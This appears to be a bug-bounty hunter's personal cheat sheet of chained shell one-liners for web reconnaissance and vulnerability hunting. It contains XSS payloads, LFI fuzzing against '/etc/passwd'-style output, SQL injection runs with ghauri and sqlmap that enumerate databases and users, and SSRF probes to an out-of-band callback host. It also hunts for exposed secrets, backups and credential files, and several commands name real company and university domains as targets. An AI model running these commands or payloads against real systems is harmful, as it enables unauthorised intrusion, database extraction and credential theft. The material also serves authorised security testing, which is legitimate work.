👑Find Endpoints
cat scope.txt | katana -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | tee all_endpoints.txt && cat scope.txt | waybackurls | tee -a all_endpoints.txt && cat scope.txt | gau | tee -a all_endpoints.txt && cat all_endpoints.txt | urldedupe | tee endpoints.txt && cat endpoints.txt | grep "=" | sort -u > fuzz_parameters.txt && cat fuzz_parameters.txt | Gxss -p '"><hacked' | tee confirm_xss.txtarjun -i all_endpoints.txt -oT asad.txt -t 10 -T 10 --passive
nslookup mytoken.us.dell.com
hostname:"mytoken.us.dell.com"Hunt Single target with Ext-Endpoint
cat live.txt | katana -d 5 -em php,htm,html,asp,aspx,jsp,jspx,do,action | uniq | sort -u | tee active_ext_endpoint.txt
cat live.txt | hakrawler -u -d 3 | tee -a crwal_endpoints.txt &&
cat all_endpoints.txt | grep ".php$" | uro | tee active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".html$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".htm$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".asp$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".aspx$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".jsp$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".jspx$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".do$" | uro | tee -a active_ext_endpoint.txt &&
cat all_endpoints.txt | grep ".action$" | uro | tee -a active_ext_endpoint.txt && cat all_endpoints.txt | grep ".js$" | tee -a active_ext_endpoint.txt &&
cat active_ext_endpoint.txt | sort -u | httpx -mc 200 -silent | tee live_ext_endpoints.txt &&
cat live.txt | waybackurls | tee archive_endpoints.txt && cat live.txt | gau | tee -a archive_endpoints.txt && cat -u archive_endpoints.txt | sort -u | uro | httpx -mc 200 -silent | tee old_endpoints.txt && cat old_endpoints.txt | grep ".php$" | tee old_ext_endpoint.txt && cat old_endpoints.txt | grep ".html$" | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".htm$" | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".asp$" | uro | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".aspx$" | uro | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".jsp$" | uro | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".jspx$" | uro | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".do$" | uro | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".action$" | uro | tee -a old_ext_endpoint.txt && cat old_endpoints.txt | grep ".js$" | tee -a old_ext_endpoint.txt && arjun -i live_endpoints.txt -oT live_endpoints_Arjun_result.txt && arjun -i old_ext_endpoint.txt -oT old_endpoints_Arjun_result.txt && rm crwal_endpoints.txt active_ext_endpoint.txt live_endpoints.txt archive_endpoints.txt old_endpoints.txt old_ext_endpoint.txtcat live.txt | katana -d 5 -f qurl | tee crwal_endpoints.txt && cat live.txt | hakrawler -u -d 3 | tee -a crwal_endpoints.txt && cat crwal_endpoints.txt | sort -u | uro | httpx -mc 200 -silent | tee live_endpoints.txt && cat live_endpoints.txt | grep "=" | tee live_parametrs.txt && cat live.txt | waybackurls | tee archive_endpoints.txt && cat live.txt | gau | tee -a archive_endpoints.txt && cat -u archive_endpoints.txt | sort -u | uro | httpx -mc 200 -silent | tee old_endpoints.txt && cat old_endpoints.txt | grep "=" | tee old_parametrs.txt && cat live_endpoints.txt old_endpoints.txt > all_endpoints.txt && cat live_parametrs.txt old_parametrs.txt > all_parametrs.txt && rm crwal_endpoints.txt archive_endpoints.txt XSS Testing:
cat all_parametrs.txt | qsreplace '"><()'| tee live_combinedfuzz.json && cat live_combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee live_XSS.txt
cat all_parametrs.txt | bhedak '"><a href=https://bing.com>hacked' | airixss -p '"><a href=https://bing.com>hacked' | tee -a possible_xss.txt
cat all_parametrs.txt | bhedak '"></h1><marquee>Hacked_by_asad</marquee>' | airixss -p '"></h2><marquee>Hacked_by_asad</marquee>' | tee -a possible_xss.txt
ca t all_endpoints.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | freq | tee -a possible_xss.txt
------------
LFI Testing:
cat all_parametrs.txt | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /home/kali/lfi.txt -c -mr "root:" -v; done
Open-Redirect Testing:
cat all_parametrs.txt | uro | nuclei -t /home/kali/nuclei-templates/url-check-templates/vuln/Url.yaml --dast
------------
SQLI Testing:
cat all_endpoints.txt | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*" | tee sqli_vuln.txt
cat all_parametrs.txt | gf sqli | tee sqli_parameters.txt && ghauri -m sqli_parameters.txt --batch --dbs --level 3 --confirm
cat all_endpoints.txt | while read host do;do ghauri -u $host--batch--level=3.-b--current-user--current-db--hostname--dbs;done
cat all_endpoints.txt | while read host do;do python3 /home/kali/sqlmap-dev/sqlmap.py -u $host--batch--level=3.-b--current-user--current-db--hostname--dbs;done
------------
SSRF Testing:
cat all_parametrs.txt | httpx -silent -threads 1000 | qsreplace http://dmrpgcwtwninoonpyohov3sjuhmqyt1c4.oast.fun
------------
nuclei Testing:
nuclei -l all_parametrs.txt -t dast/ --retries --dast -o live_dast_nuclei.txt
arjun -i all_ext_endpoint.txt -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET, POST-headers "User-Agent: Mozilla/5.0"
arjun -i all_ext_endpoint.txt -oT asad.txt -t 10 -T 10
My Methodology
sublist3r -d delltechnologies.com -o sublist3r.txt && subfinder -d delltechnologies.com -o subfinder.txt && assetfinder --subs-only delltechnologies.com > assetfinder.txt && findomain -t delltechnologies.com -u findomain.txt && curl -s "https://crt.sh/?q=%25.delltechnologies.com&output=json" | jq -r '.[].name_value' | tee /home/kali/target/dell/crt.txt && cat sublist3r.txt crt.txt assetfinder.txt subfinder.txt findomain.txt > subdomains.txt && sort -u subdomains.txt > sort.txt && cat sort.txt | httpx -silent -threads 50 | tee livesubdomains.txt && rm sublist3r.txt crt.txt assetfinder.txt subfinder.txt findomain.txt subdomains.txt sort.txt && cat livesubdomains.txt | wc -l && cat livesubdomains.txt | httpx -mc 301,302,200 -title -probe -status-code -content-length -tech-detect -fr -o technologies.txt
ffuf -u https:website.com/FUZZ -w html-Endpoints.txt -v -e .php -fc 403,401 -p 0.5-0.6
dirsearch -u https://https:website.co/path/ -w html-Endpoints.txt -O -e php
cat live.txt | katana -d 5 -f qurl | tee crwal_endpoints.txt && cat crwal_endpoints.txt | wc -l
cat live.txt | hakrawler -u -d 3 | tee -a crwal_endpoints.txt && cat crwal_endpoints.txt | wc -l
cat crwal_endpoints.txt | sort -u | httpx -mc 200 -silent | tee live_endpoints.txt
arjun -i live_endpoints.txt -oT live_endpoints_Arjun_result.txt
cat live_endpoints.txt | grep "=" | tee live_parametrs.txt && cat live_parametrs.txt | wc -l
reflector live_parametrs.txt
cat live_parametrs.txt | qsreplace '"><()'| tee live_combinedfuzz.json && cat live_combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee live_XSS.txt
cat live_parametrs.txt | bhedak '"></h2><marquee>Hacked_by_asad</marquee>' | airixss -p '"></h2><marquee>Hacked_by_asad</marquee>'
cat live_parametrs.txt | bhedak '"><svg onload=confirm(1)>' | airixss -p '"><svg onload=confirm(1)>'
cat live_parametrs.txt | gf xss | qsreplace '"><img src=x onerror=confirm(1)>' | airixss -payload "confirm(1)"
cat live_parametrs.txt | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w lfi.txt -c -mr "root:" -v; done
cat live_parametrs.txt | uro | nuclei -t /home/kali/nuclei-templates/url-check-templates/vuln/Url.yaml --dast
cat live_endpoints.txt | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*" | tee sqli_vuln.txt
cat live_parametrs.txt | gf sqli | tee sqli_parameters.txt && ghauri -m sqli_parameters.txt --batch --dbs --level 3 --confirm
cat live_parametrs.txt | httpx -silent -threads 1000 | qsreplace http://YOUR.burpcollaborator.net
nuclei -l live_parametrs.txt -t dast/ --dast -o live_dast_nuclei.txt
cat live_endpoints.txt | grep '.js$' | tee live_js_files.txt && cat live_js_files.txt | wc -l && cat live_js_files.txt | while read url; do secretfinder -i $url -o cli >> live_js_secrets.txt; done
cat live.txt | waybackurls | tee archive_endpoints.txt && cat archive_endpoints.txt | wc -l
cat live.txt | gau | tee -a archive_endpoints.txt && cat archive_endpoints.txt | wc -l
cat -u archive_endpoints.txt | sort -u | uro | httpx -mc 200 -silent | tee old_endpoints.txt
arjun -i old_endpoints.txt -oT old_endpoints_Arjun_result.txt
cat old_endpoints.txt | grep "=" | uro | tee old_parametrs.txt && cat old_parametrs.txt | wc -l
reflector old_parametrs.txt
cat old_parametrs.txt | uro | httpx -silent | qsreplace '"><()'| tee old_combinedfuzz.json && cat old_combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee old_XSS.txt
cat old_parametrs.txt | uro | httpx -silent | bhedak '"></h2><marquee>Hacked_by_asad</marquee>' | airixss -p '"></h2><marquee>Hacked_by_asad</marquee>'
cat old_parametrs.txt | bhedak '"><svg onload=confirm(1)>' | airixss -p '"><svg onload=confirm(1)>'
cat old_parametrs.txt | gf xss | uro | httpx -silent | qsreplace '"><img src=x onerror=confirm(1)>' | airixss -payload "confirm(1)"
cat old_parametrs.txt | uro | httpx -silent | nuclei -t /home/kali/nuclei-templates/url-check-templates/vuln/Url.yaml --dast
cat old_parametrs.txt | gf lfi | uro | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w lfi.txt -c -mr "root:" -v; done
cat old_endpoints.txt | grep "\?" | sed "s/=.*/=A\'/" | uniq > params.txt; cat params.txt | httpx-toolkit -mr ".*SQL.*|.*syntax.*|.*error.*|.*Server.*|.*Application.*|.*Error.*|.*'/'.*|.*ORA-00933.*|.*Microsoft.*|.*PSQLException.*"
cat old_parametrs.txt | gf sqli | uro | httpx -silent > sqli_parameters.txt && ghauri -m sqli_parameters.txt --batch --dbs --level 3 --confirm
cat old_parametrs.txt | uro | httpx -silent -threads 1000 | qsreplace http://YOUR.burpcollaborator.net
nuclei -l old_parametrs.txt -t dast/ -retries --dast -o old_dast_nuclei.txt
cat old_endpoints.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | uro | tee arjun_fuzz_endpoints.txt
cat live_endpoints.txt old_endpoints.txt | grep '.js$' | tee old_js_files.txt && old_js_files.txt | wc -l && cat old_js_files.txt | while read url; do secretfinder -i $url -o cli >> old_js_secrets.txt; done
cat live.txt | subjs | python3 /home/kali/tools/JSA/jsa.py | tee js_endpoints.txt
echo "https://press.zara.com" | subjs | python3 /home/kali/tools/JSA/jsa.py | tee js_endpoints.txt
cat livesubdomains.txt | nuclei -as -o tech_detect_nuclei.txt
cat livesubdomains.txt | nuclei -t /home/kali/nuclei-templates/subdomains-check-templates --retries 2 -o subdomains_check_nuclei.txt
cat livesubdomains.txt | nuclei -t /home/kali/nuclei-templates/all_freaking_nuclei_templates -o all_freaking_nuclei.txt
cat livesubdomains.txt | nuclei -t cves/ -o cves_nuclei.txt
cat livesubdomains.txt | nuclei -t exposures/ -o exposures_nuclei.txt
cat livesubdomains.txt | nuclei -t vulnerabilities/ -o vulnerabilities_nuclei.txt
cat livesubdomains.txt | nuclei -t exposed-panels/ -o exposed-panels_nuclei.txt
cat livesubdomains.txt | nuclei -t misconfiguration/ -o misconfiguration_nuclei.txt
cat livesubdomains.txt | nuclei -t default-logins/ -o default_logins_nuclei.txt
cat livesubdomains.txt | nuclei -t takeovers/ -o takeovers_nuclei.txt
cat livesubdomains.txt | httpx mc 200 > live.txt && cat live.txt | wc -lFuzzing Endpoints with the Same Extention Using My Wordlists and Save in hidden_endpoints.txt
ffuf -u https:website.com/FUZZ -w html-Endpoints.txt -v -fc 403,401 -p 0.5-0.6
arjun -i hidden_endpoints.txt -oT hidden_endpoints_Arjun_result.txt
dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt
dirsearch -u https://press.zara.com/ECOMPressSite/ -w html-Endpoints.txt -O -e php
arjun -i hidden_endpoints.txt -oT hidden_endpoints_Arjun_result.txtMy OneLiner
Configure Domain Name and Web Extensions and Save File Name
katana -u https://demo.testfire.net -em php,htm,html,asp,aspx,jsp,jspx,do,action | uniq | httpx -mc 200 | sort > active_ext_endpoint.txt && katana -u https://demo.testfire.net -ef | uniq | httpx -mc 200 | sort > katana_endpoint_result.txt && echo "https://demo.testfire.net/" | hakrawler -u -d 3 | uniq | httpx -mc 200 | sort > hakrawler_endpoint_result.txt && cat katana_endpoint_result.txt hakrawler_endpoint_result.txt > active_endpoints_result.txt && cat active_endpoints_result.txt | httpx -mc 200 > active_endpoints.txt && wget -O archive_endpoint_result.txt "http://web.archive.org/cdx/search/cdx?url=demo.testfire.net/*&output=text&fl=original&collapse=urlkey&from=" && gau demo.testfire.net --o gau_endpoint_result.txt && waybackurls demo.testfire.net >> wayback_endpoint_result.txt && cat archive_endpoint_result.txt gau_endpoint_result.txt wayback_endpoint_result.txt > all_endpoints.txt && cat all_endpoints.txt | grep ".php$" | httpx -mc 200 > old_php_endpoints.txt && cat all_endpoints.txt | grep ".html$" | httpx -mc 200 > old_html_endpoints.txt && cat all_endpoints.txt | httpx -mc 200 > old_endpoints.txt && rm katana_endpoint_result.txt hakrawler_endpoint_result.txt gau_endpoint_result.txt wayback_endpoint_result.txt archive_endpoint_result.txt
katana -u https://press.zara.com -jc -d 2 | grep ".js$" | uniq | httpx -mc 200 | sort > js_files.txt && cat all_endpoints.txt | grep '.js$' | uniq | httpx -mc 200 | anew js_files.txt && cat js_files.txt | while read url; do secretfinder -i $url -o cli >> secrets.txt; done && xnLinkFinder -i js_files.txt -sf https://press.zara.com -o js_hidden_endpoint.txt && mv parameters.txt js_hidden_parameters.txt && cat all_endpoints.txt | grep -i "\.log$" | httpx -mc 200 | anew log.txt && cat all_endpoints.txt | grep -i "\.bak" | httpx -mc 200 | anew bak.txt && cat all_endpoints.txt | grep -i "\.xlsx" | httpx -mc 200 | anew xlsx.txt && cat livesubdomains.txt | gauplus -subs | httpx -title | grep -i "admin\|login\|signin\|phpmyadmin\|dashboard" | anew loginPanel.txt && cat livesubdomains.txt | gauplus -subs | httpx -title | grep -i "uploadform\|uploadfile\|choose file" | anew file_upload.txt
cat all_endpoints.txt | gf xss | httpx -mc 200 > xss_parameters.txt && cat all_endpoints.txt | gf sqli | httpx -mc 200 > sqli_parameters.txt && cat all_endpoints.txt | grep "=" | httpx -mc 200 > Fuzz_parameters.txt && cat all_endpoints.txt | grep "utm_" | httpx -mc 200 > utm_parameters.txt && cat Fuzz_parameters.txt xss_parameters.txt sqli_parameters.txt utm_parameters.txt > merged_parameters.txt && cat merged_parameters.txt | Gxss -c 100 -p asad | grep asad > old_reflect_parameters.txt && cat old_reflect_parameters.txt | kxss > old_Unfiltered_parameters.txt && arjun -i active_endpoints.txt -oT active_endpoints_Arjun_result.txt && arjun -i active_ext_endpoints.txt -oT active_ext_endpoints_Arjun_result.txt && arjun -i old_endpoints.txt -oT old_endpoints_Arjun_result.txt && arjun -i old_jsp_endpoints.txt -oT old_jsp_endpoints_Arjun_result.txt && arjun -i old_htm_endpoints.txt -oT old_htm_endpoints_Arjun_result.txt && cat active_endpoints_Arjun_result.txt active_ext_endpoints_Arjun_result.txt old_endpoints_Arjun_result.txt old_jsp_endpoints_Arjun_result.txt old_htm_endpoints_Arjun_result.txt > merged_endpoints_Arjun_result_to_chek_XSS.txt && cat merged_endpoints_Arjun_result_to_chek_XSS.txt | Gxss -c 100 -p asad | grep asad > Arjun_reflect_parameters.txt && cat merged_endpoints_Arjun_result_to_chek_XSS.txt | kxss > Arjun_Unfiltered_parameters.txtMy OneLiner for Burp
Configure Domain Name
cat active_endpoints.txt active_ext_endpoints.txt old_endpoints.txt old_jsp_endpoints.txt old_htm_endpoints.txt | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null && echo "https://demo.testfire.net/" | hakrawler -u -d 3 -proxy "http://127.0.0.1:8080" && gospider -s "https://demo.testfire.net/" -c 10 -d 1 -t 20 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" --other-source | grep -e "code-200" | grep "=" | grep $https://demo.testfire.net -p http://127.0.0.1:8080-------------------------------------------------------------
Find Endpoints with the Same Extension Using Dirsearch
dirsearch -u https://example.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json --full-urldirsearch -u https://app.redacted.com -t 150 -x 403,404,500,429 -i 200,301,302 — random-agent-------------------------------------------------------------
Find Endpoints with with Burp proxy Using hakrawler
And Save in active_endpoints.txt
cat domain.txt | hakrawler -u -d 3 -proxy "http://127.0.0.1:8080"
cat domain.txt | hakrawler -u -d 3 | uniq | httpx -mc 200 | sort > active_endpoints.txt
echo "https://demo.testfire.net/" | hakrawler -u -d 3 | uniq | httpx -mc 200 | sort > active_endpoints.txt-------------------------------------------------------------
Find Endpoints with Burp proxy Using gospider
gospider -s "https://demo.testfire.net/" -c 10 -d 1 -t 20 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" --other-source | grep -e "code-200" | grep "=" | grep $https://demo.testfire.net -p http://127.0.0.1:8080-------------------------------------------------------------
echo http://testphp.vulnweb.com | hakrawler -d 10 -u | grep "$http://testphp.vulnweb.com" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)"Find Endpoints with the Same Extention Using katana and Save in active_endpoints.txt
katana -u https://techdocs.broadcom.com -em php,html | uniq | httpx -mc 200 | sort > active_endpoints.txtcat active_endpoints.txt | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null-------------------------------------------------------------
katana -u https://demo.testfire.net | uniq | httpx-toolkit -mc 200 | sort > active_endpoints.txt && echo "https://demo.testfire.net/" | hakrawler -u -d 3 | uniq | httpx-toolkit -mc 200 | sort > active_endpoints.txt && katana -u https://demo.testfire.net -em php,htm,html,asp,aspx,jsp,jspx,do,action | uniq | httpx-toolkit -mc 200 | sort > active_ext_endpoints.txt && wget -O all.txt "http://web.archive.org/cdx/search/cdx?url=demo.testfire.net/*&output=text&fl=original&collapse=urlkey&from=" && gau demo.testfire.net --o all.txt && waybackurls demo.testfire.net >> all.txt && cat all.txt | grep ".php$" | httpx-toolkit -mc 200 > old_ext_endpoints.txt && cat all.txt | grep ".html$" | httpx-toolkit -mc 200 > old_ext_endpoints.txt && cat all.txt | httpx-toolkit -mc 200 > old_endpoints.txt Find All Endpoints Using Archive URL and Save in old_endpoints.txt
wget -O all.txt "https://web.archive.org/cdx/search/cdx?url=*.zuora.com/*&output=text&fl=original&collapse=urlkey&from=" && cat all.txt | grep -E '\.xls|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.git|\.env|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc|\.conf|\..htaccess|\.htpasswd|\.pfx|\.p12|\.swp\.old|\.temp|\.dump|\.passwd|\.shadow|\.git|\.svn|\.DS_Store|\.idea|\.vscode|\.bash_history|\.zsh_history'http://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from=wget -O all.txt "http://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from="gau website.com --o all.txt
waybackurls website.com >> all.txt
gospider -s "https://demo.testfire.net/" -c 10 -d 1 -o all.txtcat all.txt | grep ".php$" | httpx -mc 200 > old_ext_endpoints.txtcat all.txt | grep ".html$" | httpx -mc 200 > old_ext_endpoints.txtcat all.txt | httpx -mc 200 > old_endpoints.txtcat all.txt | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null-------------------------------------------------------------
Fuzzing Endpoints with the Same Extention Using My Wordlists and Save in hidden_endpoints.txt
ffuf -u https:website.com/FUZZ -w My_wordlist/php.txt -mc 200 -p 0.5-0.6 > hidden_endpoints.txt
ffuf-result.txt | grep URL > hidden_endpoints.txt
ffuf -u https:website.com/FUZZ -w My_wordlist/php.txt -mc 200 -p 0.5-0.6 -x "http://127.0.0.1:8080"cat hidden_endpoints.txt | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null-------------------------------------------------------------
Google Dork to Find Endpoints and Save live_endpoints.txt
site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?go-dork -q site:fics.nust.edu.pk ext:phpcat live_endpoints.txt | parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' >> /dev/null-------------------------------------------------------------
Find Endpoints using javascript bookmarklet that will extract all endpoints
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g,jsRegex=/(?<=(\"|\'|\%60))(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'%60]*)?(?=(\"|\'|\%60))/g;const results=new Set;const paramMap=new Map();const jsFiles=new Set();function processContent(t,src){var e=t.matchAll(regex);for(let r of e){results.add(r[0]);var params=r[0].split('?')[1];if(params){params.split('&').forEach(param=>{var [key,]=param.split('=');if(key){if(!paramMap.has(key)){paramMap.set(key,[]);}paramMap.get(key).push(src||'Inline script or HTML');}});}}var j=t.matchAll(jsRegex);for(let r of j){jsFiles.add(r[0]);}}for(var i=0;i<scripts.length;i++){var t=scripts[i].src;if(t){jsFiles.add(t);fetch(t).then(function(t){return t.text()}).then(text=>processContent(text,t)).catch(function(t){console.log("An error occurred: ",t)});}else{processContent(scripts[i].textContent);}}var pageContent=document.documentElement.outerHTML;processContent(pageContent,'Page content');function writeResults(){var div=document.createElement("div");div.style.cssText="position:fixed;top:0;left:0;width:100%;height:100%;background:#f0f8ff;color:#333;overflow:auto;z-index:9999;padding:20px;font-family:Arial,sans-serif;";var content="<h2 style='color:#4a69bd;'>Endpoints Found: " + results.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";content+=Array.from(results).map(endpoint=>{var fullUrl=endpoint.startsWith("http")?endpoint:window.location.origin+endpoint;return "<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + endpoint + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + fullUrl + "</a></div>"}).join("");content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>Parameters Found:</h2>";content+="<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";paramMap.forEach((sources,param)=>{content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + param + "</div><div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + sources.join('<br>') + "</div>";});content+="</div>";content+="<h2 style='color:#4a69bd;margin-top:20px;'>JS Files Found: " + jsFiles.size + "</h2>";content+="<div style='display:grid;grid-template-columns:1fr;gap:10px;'>";jsFiles.forEach(file=>{var fullUrl=file.startsWith("http")?file:window.location.origin+file;content+="<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'><a href='" + fullUrl + "' target='_blank' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + file + "</a></div>";});content+="</div>";div.innerHTML=content;var closeBtn=document.createElement("button");closeBtn.textContent="Close";closeBtn.style.cssText="position:fixed;top:10px;right:10px;background:#4a69bd;color:white;border:none;padding:10px 20px;cursor:pointer;";closeBtn.onclick=function(){document.body.removeChild(div);};div.appendChild(closeBtn);document.body.appendChild(div)}setTimeout(writeResults,3000);})();javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();Last updated